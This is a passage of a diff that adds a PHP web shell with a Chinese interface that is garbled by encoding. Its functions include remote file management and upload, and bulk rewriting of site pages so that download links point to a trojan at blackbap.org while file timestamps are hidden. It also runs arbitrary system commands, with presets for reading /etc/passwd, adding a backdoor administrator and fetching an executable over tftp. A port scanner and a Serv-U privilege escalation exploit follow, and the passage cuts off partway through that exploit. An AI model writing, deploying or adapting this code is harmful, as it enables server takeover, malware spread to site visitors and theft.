+	<option value="E:/">E��</option>
+	<option value="F:/">F��</option>
+	<option value="C:/Documents and Settings/All Users/����ʼ���˵�/����/����">������</option>
+	<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup">������(Ӣ)</option>
+	<option value="C:/RECYCLER">����վ</option>
+	<option value="C:/Program Files">Programs</option>
+	<option value="/etc">etc</option>
+	<option value="/home">home</option>
+	<option value="/usr/local">Local</option>
+	<option value="/tmp">Temp</option>
+</select><input type="submit" value="ת��" style="width:50px;"></form>
+<div style="margin-top:3px;"></div>
+<form method="POST" action="?s=a&p={$THIS_DIR}" enctype="multipart/form-data">
+	<input type="button" value="�½��ļ�" onclick="Inputok('newfile.php','?s=p&fp={$THIS_DIR}&fn=');">
+	<input type="button" value="�½�Ŀ¼" onclick="Inputok('newdir','?s=a&p={$THIS_DIR}&dn=');"> 
+	<input type="button" value="�����ϴ�" onclick="window.location='?s=q&p={$REAL_DIR}';"> 
+	<input type="file" name="ufp" style="width:300px;height:22px;">
+	<input type="text" name="ufn" style="width:121px;height:22px;">
+	<input type="submit" value="�ϴ�" style="width:50px;">
+</form></div>
+<form method="POST" name="fileall" id="fileall" action="?s=a&p={$THIS_DIR}">
+<table border="0"><tr><td class="toptd" style="width:450px;"> <a href="?s=a&p={$UP_DIR}"><b>�ϼ�Ŀ¼</b></a></td>
+<td class="toptd" style="width:80px;"> ���� </td><td class="toptd" style="width:48px;"> ���� </td><td class="toptd" style="width:173px;"> �޸�ʱ�� </td><td class="toptd" style="width:75px;"> ��С </td></tr>
+END;
+	if(($h_d = @opendir($p)) == NULL) return false;
+	while(false !== ($Filename = @readdir($h_d)))
+	{
+		if($Filename == '.' or $Filename == '..') continue;
+		$Filepath = File_Str($REAL_DIR.'/'.$Filename);
+		if(is_dir($Filepath))
+		{
+			$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
+			$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
+			$Filepath = urlencode($Filepath);
+			echo "\r\n".' <tr><td> <a href="?s=a&p='.$Filepath.'"><font face="wingdings" size="3">0</font><b> '.$Filename.' </b></a> </td> ';
+			$Filename = urlencode($Filename);
+			echo ' <td> <a href="#" onclick="Delok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&dd='.$Filename.'\');return false;"> ɾ�� </a> ';
+			echo ' <a href="#" onclick="Inputok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&mn='.$Filename.'&rn=\');return false;"> ���� </a> </td> ';
+			echo ' <td> <a href="#" onclick="Inputok(\''.$Fileperm.'\',\'?s=a&p='.$THIS_DIR.'&mk='.$Filename.'&md=\');return false;"> '.$Fileperm.' </a> </td> ';
+			echo ' <td>'.$Filetime.'</td> ';
+			echo ' <td> </td> </tr>'."\r\n";
+			$NUM_D++;
+		}
+	}
+	@rewinddir($h_d);
+	while(false !== ($Filename = @readdir($h_d)))
+	{
+		if($Filename == '.' or $Filename == '..') continue;
+		$Filepath = File_Str($REAL_DIR.'/'.$Filename);
+		if(!is_dir($Filepath))
+		{
+			$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$Filepath);
+			$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
+			$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
+			$Filesize = File_Size(@filesize($Filepath));
+			if($Filepath == File_Str(__FILE__)) $fname = '<font color="#8B0000">'.$Filename.'</font>'; else $fname = $Filename;
+			echo "\r\n".' <tr><td> <input type="checkbox" name="files[]" value="'.urlencode($Filepath).'"><a target="_blank" href="'.$Fileurls.'">'.$fname.'</a> </td>';
+			$Filepath = urlencode($Filepath);
+			$Filename = urlencode($Filename);
+			echo ' <td> <a href="?s=p&fp='.$THIS_DIR.'&fn='.$Filename.'"> �༭ </a> ';
+			echo ' <a href="#" onclick="Inputok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&mn='.$Filename.'&rn=\');return false;"> ���� </a> </td>';
+			echo ' <td>'.$Fileperm.'</td> ';
+			echo ' <td>'.$Filetime.'</td> ';
+			echo ' <td align="right"> <a href="?s=a&df='.$Filepath.'">'.$Filesize.'</a> </td></tr> '."\r\n";
+			$NUM_F++;
+		}
+	}
+	@closedir($h_d);
+	if(!$Filetime) $Filetime = '2009-01-01 00:00:00';
+print<<<END
+</table>
+<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined"> 
+<input type="hidden" id="inver" name="inver" value="undefined"> 
+<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"> 
+<input type="button" value="����" onclick="SubmitUrl('������ѡ�ļ���·��: ','{$THIS_DIR}','a');return false;"> 
+<input type="button" value="ɾ��" onclick="Delok('��ѡ�ļ�','b');return false;"> 
+<input type="button" value="����" onclick="SubmitUrl('�޸���ѡ�ļ�����ֵΪ: ','0666','c');return false;"> 
+<input type="button" value="ʱ��" onclick="CheckDate('{$Filetime}','d');return false;"> 
+<input type="button" value="���" onclick="SubmitUrl('�����������ѡ�ļ�������Ϊ: ','silic.gz','e');return false;"> 
+Ŀ¼({$NUM_D}) / �ļ�({$NUM_F})</div> </form> 
+END;
+return true;
+}
+//�����滻
+function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb)
+{
+	if(($h_d = @opendir($tp)) == NULL) return false;
+	while(false !== ($Filename = @readdir($h_d)))
+	{
+		if($Filename == '.' || $Filename == '..') continue;
+		$Filepath = File_Str($tp.'/'.$Filename);
+		if(is_dir($Filepath) && $tb) Tihuan_Auto($Filepath,$tt,$th,$tca,$tcb,$td,$tb);
+		$doing = false;
+		if(eregi($tt,$Filename))
+		{
+			$ic = File_Read($Filepath);
+			if($th)
+			{
+				if(!stristr($ic,$tca)) continue;
+				$ic = str_replace($tca,$tcb,$ic);
+				$doing = true;
+			}
+			else
+			{
+				preg_match_all("/href\=\"([^~]*?)\"/i",$ic,$nc);
+				for($i = 0;$i < count($nc[1]);$i++){if(eregi($tca,$nc[1][$i])){$ic = str_replace($nc[1][$i],$tcb,$ic);$doing = true;}}
+			}
+			if($td) $ftime = @filemtime($Filepath);
+			if($doing) echo File_Write($Filepath,$ic,'wb') ? '<font color="#006600">�ɹ�:</font>'.$Filepath.' <br>'."\r\n" : '<font color="#FF0000">ʧ��:</font>'.$Filepath.' <br>'."\r\n";
+			if($td) @touch($Filepath,$ftime);
+			ob_flush();
+			flush();
+		}
+	}
+	@closedir($h_d);
+	return true;
+}
+function Tihuan_d()
+{
+	if((!empty($_POST['tp'])) && (!empty($_POST['tt'])))
+	{
+		echo '<div class="actall">';
+		$tt = str_replace('.','\\.',$_POST['tt']);
+		$td = isset($_POST['td']) ? true : false;
+		$tb = ($_POST['tb'] == 'a') ? true : false;
+		$th = ($_POST['th'] == 'a') ? true : false;
+		if($th) $_POST['tca'] = str_replace('.','\\.',$_POST['tca']);
+		echo Tihuan_Auto($_POST['tp'],$tt,$th,$_POST['tca'],$_POST['tcb'],$td,$tb) ? '<a href="#" onclick="window.location=\'?s=d\'">�滻���</a>' : '<a href="#" onclick="window.location=\'?s=d\'">�쳣��ֹ</a>';
+		echo '</div>';
+		return false;
+	}
+	$FILE_DIR = File_Str(dirname(__FILE__));
+	$ROOT_DIR = File_Mode();
+print<<<END
+<script language="javascript">
+function Fulllll(i){
+	if(i==0) return false;
+  Str = new Array(5);
+  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";tform.tp.value = Str[i];}
+	else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";tform.tt.value = Str[i];}
+  return true;
+}
+function showth(th){
+	if(th == 'a') document.getElementById('setauto').innerHTML = '��������:<textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br>�滻��Ϊ:<textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea>';
+	if(th == 'b') document.getElementById('setauto').innerHTML = '<br>���غ�׺ <input type="text" name="tca" id="tca" value=".exe|.7z|.rar|.zip|.gz|.txt" style="width:500px;"><br><br>�滻��Ϊ <input type="text" name="tcb" id="tcb" value="http://blackbap.org/muma.exe" style="width:500px;">';
+	return true;
+}
+function autoup(){
+	if(document.getElementById('tp').value == ''){alert('·������Ϊ��');return false;}
+	if(document.getElementById('tt').value == ''){alert('���Ͳ���Ϊ��');return false;}
+	if(document.getElementById('tca').value == ''){alert('���벻��Ϊ��');return false;}
+	document.getElementById('tform').submit();
+}
+</script>
+<form method="POST" name="tform" id="tform" action="?s=d">
+<div class="actall" style="height:35px;">�滻·�� <input type="text" name="tp" id="tp" value="{$ROOT_DIR}" style="width:500px;">
+<select onchange='return Fulllll(options[selectedIndex].value)'>
+<option value="0" selected>--��Χѡ��--</option>
+<option value="1">��վ��Ŀ¼</option>
+<option value="2">������Ŀ¼</option>
+</select></div>
+<div class="actall" style="height:35px;">�ļ����� <input type="text" name="tt" id="tt" value=".htm|.html|.shtml" style="width:500px;">
+<select onchange='return Fulllll(options[selectedIndex].value)'>
+<option value="0" selected>--����ѡ��--</option>
+<option value="3">��̬�ļ�</option>
+<option value="4">�ű�+��̬</option>
+<option value="5">JS�ļ�</option>
+</select></div>
+<div class="actall" style="height:235px;"><input type="radio" name="th" value="a" onclick="showth('a')" checked>�滻�ļ��е�ָ������ <input type="radio" name="th" value="b" onclick="showth('b')">�滻�ļ��е����ص�ַ<br>
+<div id="setauto">�������� <textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br>�滻��Ϊ <textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea></div></div>
+<div class="actall" style="height:30px;"><input type="checkbox" name="td" value="1" checked>�����ļ��޸�ʱ�䲻��</div>
+<div class="actall" style="height:50px;"><input type="radio" name="tb" value="a" checked>���滻Ӧ���ڸ��ļ���,���ļ��к��ļ�
+<br><input type="radio" name="tb" value="b">�����滻Ӧ���ڸ��ļ���</div>
+<div class="actall"><input type="button" value="��ʼ�滻" style="width:80px;height:26px;" onclick="autoup();"></div>
+</form>
+END;
+return true;
+}
+//ɨ��ľ��
+function Antivirus_Auto($sp,$features,$st,$sb)
+{
+	if(($h_d = @opendir($sp)) == NULL) return false;
+	$ROOT_DIR = File_Mode();
+	while(false !== ($Filename = @readdir($h_d)))
+	{
+		if($Filename == '.' || $Filename == '..') continue;
+		$Filepath = File_Str($sp.'/'.$Filename);
+		if(is_dir($Filepath) && $sb) Antivirus_Auto($Filepath,$features,$st);
+		if(eregi($st,$Filename))
+		{
+			if($Filepath == File_Str(__FILE__)) continue;
+			$ic = File_Read($Filepath);
+			foreach($features as $var => $key)
+			{
+				if(stristr($ic,$key))
+				{
+					$Fileurls = str_replace($ROOT_DIR,'http://'.$_SERVER['SERVER_NAME'].'/',$Filepath);
+					$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
+					echo ' <a href="'.$Fileurls.'" target="_blank"> <font color="#8B0000"> '.$Filepath.' </font> </a> <br> ��<a href="?s=e&fp='.urlencode($sp).'&fn='.$Filename.'&dim='.urlencode($key).'" target="_blank"> �༭ </a> <a href="?s=e&df='.urlencode($Filepath).'" target="_blank"> ɾ�� </a> �� ';
+					echo ' �� '.$Filetime.' �� <font color="#FF0000"> '.$var.' </font> <br> <br> '."\r\n";
+					break;
+				}
+			}
+			ob_flush();
+			flush();
+		}
+	}
+	@closedir($h_d);
+	return true;
+}
+
+function Antivirus_e()
+{
+	if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo 'ɾ���ɹ�';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? 'ɾ���ɹ�' : 'ɾ��ʧ��';} return false;}
+	if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }
+	$SCAN_DIR = isset($_POST['sp']) ? $_POST['sp'] : File_Mode();
+	$features_php = array('evalһ�仰����'=>'eval(','����read����'=>'->read()','����readdir����3'=>'readdir(','MYSQL�Զ��庯�����'=>'returns string soname','��������1'=>'eval(gzinflate(','��������2'=>'eval(base64_decode(','��������3'=>'base64_decode(','evalһ�仰2'=>'eval (','php��������'=>'copy($_FILES','��������2'=>'copy ($_FILES','�ϴ�����'=>'move_uploaded_file($_FILES','�ϴ�����2'=>'move_uploaded_file ($_FILES','С������'=>'str_replace(\'\\\\\',\'/\',');
+	$features_asx = array('�ű�����'=>'VBScript.Encode','��������'=>'#@~^','fso���'=>'fso.createtextfile(path,true)','excuteһ�仰'=>'execute','evalһ�仰'=>'eval','wscript����'=>'F935DC22-1CF0-11D0-ADB9-00C04FD58A0B','���ݿ��������'=>'13709620-C279-11CE-A49E-444553540000','wscript����'=>'WScript.Shell','fso����'=>'0D43FE01-F093-11CF-8940-00A0C9054228','ʮ������'=>'���','aspx��������'=>'Process.GetProcesses','aspxһ�仰'=>'Request.BinaryRead');
+print<<<END
+<form method="POST" name="tform" id="tform" action="?s=e">
+<div class="actall">ɨ��·�� <input type="text" name="sp" id="sp" value="{$SCAN_DIR}" style="width:600px;"></div>
+<div class="actall">ľ������ <input type="checkbox" name="stphp" value="php" checked>phpľ�� 
+<input type="checkbox" name="stasx" value="asx">asp+aspxľ��</div>
+<div class="actall" style="height:50px;"><input type="radio" name="sb" value="a" checked>��ɨ��Ӧ���ڸ��ļ���,���ļ��к��ļ�
+<br><input type="radio" name="sb" value="b">����ɨ��Ӧ���ڸ��ļ���</div>
+<div class="actall"><input type="submit" value="��ʼɨ��" style="width:80px;"></div>
+</form>
+END;
+if(!empty($_POST['sp']))
+{
+	echo '<div class="actall">';
+	if(isset($_POST['stphp'])){$features_all = $features_php; $st = '\.php|\.inc|\;';}
+	if(isset($_POST['stasx'])){$features_all = $features_asx; $st = '\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';}
+	if(isset($_POST['stphp']) && isset($_POST['stasx'])){$features_all = array_merge($features_php,$features_asx); $st = '\.php|\.inc|\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';}
+	$sb = ($_POST['sb'] == 'a') ? true : false;
+	echo Antivirus_Auto($_POST['sp'],$features_all,$st,$sb) ? 'ɨ�����' :  '�쳣��ֹ';
+	echo '</div>';
+}
+return true;
+}
+//�����ļ�
+function Findfile_Auto($sfp,$sfc,$sft,$sff,$sfb)
+{
+	//echo $sfp.'<br>'.$sfc.'<br>'.$sft.'<br>'.$sff.'<br>'.$sfb;
+	if(($h_d = @opendir($sfp)) == NULL) return false;
+	while(false !== ($Filename = @readdir($h_d)))
+	{
+		if($Filename == '.' || $Filename == '..') continue;
+		if(eregi($sft,$Filename)) continue;
+		$Filepath = File_Str($sfp.'/'.$Filename);
+		if(is_dir($Filepath) && $sfb) Findfile_Auto($Filepath,$sfc,$sft,$sff,$sfb);
+		if($sff)
+		{
+			if(stristr($Filename,$sfc))
+			{
+				echo '<a target="_blank" href="?s=p&fp='.urlencode($sfp).'&fn='.urlencode($Filename).'"> '.$Filepath.' </a><br>'."\r\n";
+				ob_flush();
+				flush();
+			}
+		}
+		else
+		{
+			$File_code = File_Read($Filepath);
+			if(stristr($File_code,$sfc))
+			{
+				echo '<a target="_blank" href="?s=p&fp='.urlencode($sfp).'&fn='.urlencode($Filename).'"> '.$Filepath.' </a><br>'."\r\n";
+				ob_flush();
+				flush();
+			}
+		}
+	}
+	@closedir($h_d);
+	return true;
+}
+function Findfile_j()
+{
+	if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo 'ɾ���ɹ�';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? 'ɾ���ɹ�' : 'ɾ��ʧ��';} return false;}
+	if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }
+	$SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode();
+	$SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config';
+	$SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip|.pdf|.dll|.exe|.txt|.inf|.ppt|.xls|.js';
+print<<<END
+<form method="POST" name="jform" id="jform" action="?s=j">
+<div class="actall">ɨ��·�� <input type="text" name="sfp" value="{$SCAN_DIR}" style="width:600px;"></div>
+<div class="actall">�����ļ� <input type="text" name="sft" value="{$SCAN_TYPE}" style="width:600px;"></div>
+<div class="actall">�ؼ��ִ� <input type="text" name="sfc" value="{$SCAN_CODE}" style="width:395px;">
+<input type="radio" name="sff" value="a" checked>�����ļ��� 
+<input type="radio" name="sff" value="b">������������</div>
+<div class="actall" style="height:50px;"><input type="radio" name="sfb" value="a" checked>������Ӧ���ڸ��ļ���,���ļ��к��ļ�
+<br><input type="radio" name="sfb" value="b">��������Ӧ���ڸ��ļ���</div>
+<div class="actall"><input type="submit" value="��ʼɨ��" style="width:80px;"></div>
+</form>
+END;
+	if((!empty($_POST['sfp'])) && (!empty($_POST['sfc'])))
+	{
+		echo '<div class="actall">';
+		$_POST['sft'] = str_replace('.','\\.',$_POST['sft']);
+		$sff = ($_POST['sff'] == 'a') ? true : false;
+		$sfb = ($_POST['sfb'] == 'a') ? true : false;
+		echo Findfile_Auto($_POST['sfp'],$_POST['sfc'],$_POST['sft'],$sff,$sfb) ? '�������' : '�쳣��ֹ';
+		echo '</div>';
+	}
+	return true;
+}
+//ϵͳ��Ϣ
+function Info_Cfg($varname){
+switch($result = get_cfg_var($varname)){
+	case 0:return "No";break;
+	case 1:return "Yes";break;
+	default:return $result;break;}}
+function Info_Fun($funName){return(false !==function_exists($funName)) ? "Yes" : "No";}
+function Info_f()
+{
+$dis_func = get_cfg_var("disable_functions");
+$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "�������ϴ�";
+$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
+if($dis_func == ""){$dis_func = "No";}
+else{
+	$dis_func = str_replace(" ","<br>",$dis_func);
+	$dis_func = str_replace(",","<br>",$dis_func);
+}
+$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
+$info = array(
+array("������ʱ��/����ʱ��",date("Y��m��d�� h:i:s",time())."&nbsp;/&nbsp;".gmdate("Y��n��j�� H:i:s",time()+8*3600)),
+array("����������:�˿�(ip)","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>:".$_SERVER['SERVER_PORT']." ( ".gethostbyname($_SERVER['SERVER_NAME'])." )"),
+array("����������ϵͳ(���ֱ���)",PHP_OS." (".$_SERVER['HTTP_ACCEPT_LANGUAGE'].")"),
+array("��������������",$_SERVER['SERVER_SOFTWARE']),
+array("���IP",getenv('REMOTE_ADDR')),
+array("PHP���з�ʽ(�汾)",strtoupper(php_sapi_name())."(".PHP_VERSION.") / ��ȫģʽ:".Info_Cfg("safemode")),
+array("����������Ա",$adminmail),
+array("���ļ�·��",__FILE__),
+array("����ʹ��URL���ļ�[allow_url_fopen]",Info_Cfg("allow_url_fopen")),
+array("������̬�������ӿ�[enable_dl]",Info_Cfg("enable_dl")),
+array("��ʾ������Ϣ[display_errors]",Info_Cfg("display_errors")),
+array("�Զ���ȫ�ֱ���[register_globals]",Info_Cfg("register_globals")),
+array("�Զ��ַ���ת��[magic_quotes_gpc]",Info_Cfg("magic_quotes_gpc")),
+array("����ڴ�ʹ����[memory_limit]",Info_Cfg("memory_limit")),
+array("POST����ֽ�[post_max_size]",Info_Cfg("post_max_size")),
+array("��������ϴ�[upload_max_filesize]",$upsize),
+array("���������ʱ��[max_execution_time]",Info_Cfg("max_execution_time")."��"),
+array("���ú���[disable_functions]",$dis_func),
+array("������Ϣ����[phpinfo()]",$phpinfo),
+array("Ŀǰ���п���ռ�diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
+array("GZѹ���ļ�֧��[zlib]",Info_Fun("gzclose")),
+array("ZIPѹ���ļ�֧��[ZipArchive(php_zip)]",Info_Fun("zip_open")),
+array("IMAP�����ʼ�ϵͳ",Info_Fun("imap_close")),
+array("XML����",Info_Fun("xml_set_object")),
+array("FTP��½",Info_Fun("ftp_login")),
+array("Session֧��",Info_Fun("session_start")),
+array("Socket֧��",Info_Fun("fsockopen")),
+array("MySQL���ݿ�",Info_Fun("mysql_close")),
+array("MSSQL���ݿ�",Info_Fun("mssql_close")),
+array("Postgre SQL���ݿ�",Info_Fun("pg_close")),
+array("SQLite���ݿ�",Info_Fun("sqlite_close")),
+array("Oracle���ݿ�",Info_Fun("ora_close")),
+array("Oracle 8���ݿ�",Info_Fun("OCILogOff")),
+array("SyBase���ݿ�",Info_Fun("sybase_close")),
+array("Hyperwave���ݿ�",Info_Fun("hw_close")),
+array("InforMix���ݿ�",Info_Fun("ifx_close")),
+array("FilePro���ݿ�",Info_Fun("filepro_fieldcount")),
+array("DBA/DBM����",Info_Fun("dba_close")."&nbsp;/&nbsp;".Info_Fun("dbmclose")),
+array("ODBC/dBASE����",Info_Fun("odbc_close")."&nbsp;/&nbsp;".Info_Fun("dbase_close")),
+array("PREL�����﷨[PCRE]",Info_Fun("preg_match")),
+array("PDF֧��",Info_Fun("pdf_close")),
+array("ͼ�δ���[GD Library]",Info_Fun("imageline")),
+array("SNMP���������",Info_Fun("snmpget")),);
+echo '<table width="100%" border="0">';
+for($i = 0;$i < count($info);$i++){echo '<tr><td width="40%">'.$info[$i][0].'</td><td>'.$info[$i][1].'</td></tr>'."\n";}
+echo '</table>';
+return true;
+}
+//ִ������
+function Exec_Run($cmd)
+{
+	$res = '';
+	if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);}
+	elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}
+	elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}
+	elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}
+	elseif(@is_resource($f = @popen($cmd,"r"))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}
+	return $res;
+}
+function Exec_g()
+{
+	$res = '����';
+	$cmd = 'dir';
+	if(!empty($_POST['cmd'])){$res = Exec_Run($_POST['cmd']);$cmd = $_POST['cmd'];}
+print<<<END
+<script language="javascript">
+function sFull(i){
+	Str = new Array(14);
+	Str[0] = "dir";
+	Str[1] = "ls /etc";
+	Str[2] = "cat /etc/passwd";
+	Str[3] = "cp -a /home/www/html/a.php /home/www2/";
+	Str[4] = "uname -a";
+	Str[5] = "gcc -o /tmp/silic /tmp/silic.c";
+	Str[6] = "net user silic silic /add & net localgroup administrators silic /add";
+	Str[7] = "net user";
+	Str[8] = "netstat -an";
+	Str[9] = "ipconfig";
+	Str[10] = "copy c:\\1.php d:\\2.php";
+	Str[11] = "tftp -i 123.234.222.1 get silic.exe c:\\silic.exe";
+	Str[12] = "lsb_release -a";
+	Str[13] = "chmod 777 /tmp/silic.c";
+document.getElementById('cmd').value = Str[i];
+return true;
+}
+</script>
+<form method="POST" name="gform" id="gform" action="?s=g"><center><div class="actall">
+������� <input type="text" name="cmd" id="cmd" value="{$cmd}" style="width:399px;">
+<select onchange='return sFull(options[selectedIndex].value)'>
+<option value="0" selected>--�����--</option>
+<option value="1">�ļ��б�</option>
+<option value="2">��ȡ����</option>
+<option value="3">�����ļ�</option>
+<option value="4">ϵͳ��Ϣ</option>
+<option value="5">�����ļ�</option>
+<option value="6">���ӹ���</option>
+<option value="7">�û��б�</option>
+<option value="8">�鿴�˿�</option>
+<option value="9">�鿴��ַ</option>
+<option value="10">�����ļ�</option>
+<option value="11">FTP����</option>
+<option value="12">�ں˰汾</option>
+<option value="13">��������</option>
+</select>
+<input type="submit" value="ִ��" style="width:80px;"></div>
+<div class="actall"><textarea name="show" style="width:660px;height:399px;">{$res}</textarea></div></center></form>
+END;
+return true;
+}
+//ɨ��˿�
+function Port_i()
+{
+$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
+$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|22|23|25|80|110|111|135|139|443|445|1433|1521|3306|3389|4899|5432|5631|7001|8000|8080|14147|43958';
+print<<<END
+<form method="POST" name="iform" id="iform" action="?s=i">
+<div class="actall">ɨ��IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>
+<div class="actall">�˿ں� <input type="text" name="port" value="{$Port_port}" style="width:720px;"></div>
+<div class="actall"><input type="submit" value="ɨ��" style="width:80px;"></div>
+</form>
+END;
+	if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
+	{
+		echo '<div class="actall">';
+		$ports = explode('|', $_POST['port']);
+		for($i = 0;$i < count($ports);$i++)
+		{
+			$fp = @fsockopen($_POST['ip'],$ports[$i],&$errno,&$errstr,2);
+			echo $fp ? '<font color="#FF0000">���Ŷ˿� ---> '.$ports[$i].'</font><br>' : '�رն˿� ---> '.$ports[$i].'<br>';
+			ob_flush();
+			flush();
+		}
+		echo '</div>';
+	}
+	return true;
+}
+//ServU
+function Servu_l()
+{
+$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
+print<<<END
+<div class="actall"><a href="?s=l">[ִ������]</a> <a href="?s=l&o=adduser">[�����û�]</a></div>
+<form method="POST">
+	<div class="actall">ServU�˿� <input name="SUPort" type="text" value="43958" style="width:300px"></div>
+	<div class="actall">ServU�û� <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
+	<div class="actall">ServU���� <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
+END;
+if($_GET['o'] == 'adduser')
+{
+print<<<END
+<div class="actall">�ʺ� <input name="user" type="text" value="yoco" style="width:200px">
+���� <input name="password" type="text" value="silic" style="width:200px">
+Ŀ¼ <input name="part" type="text" value="C:\\\\" style="width:200px"></div>
+END;
+}
+else
+{
+print<<<END
+<div class="actall">��Ȩ���� <input name="SUCommand" type="text" value="net user silic silic /add & net localgroup administrators silic /add" style="width:600px"><br>
+<input name="user" type="hidden" value="silic">
+<input name="password" type="hidden" value="silic">
+<input name="part" type="hidden" value="C:\\\\"></div>
+END;
+}
+echo '<div class="actall"><input type="submit" value="ִ��" style="width:80px;"></div></form>';
+	if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
+	{
+		echo '<div class="actall">';
+		$sendbuf = "";
+		$recvbuf = "";
+		$domain  = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
+		$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
+							 "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
+							 "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
+		$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
+		$sock = @fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10);
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = "USER ".$_POST["SUUser"]."\r\n";
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = "SITE MAINTENANCE\r\n";
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = $domain;
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = $adduser;
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		if(!empty($_POST['SUCommand']))
+		{
+	 		$exp = @fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10);
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
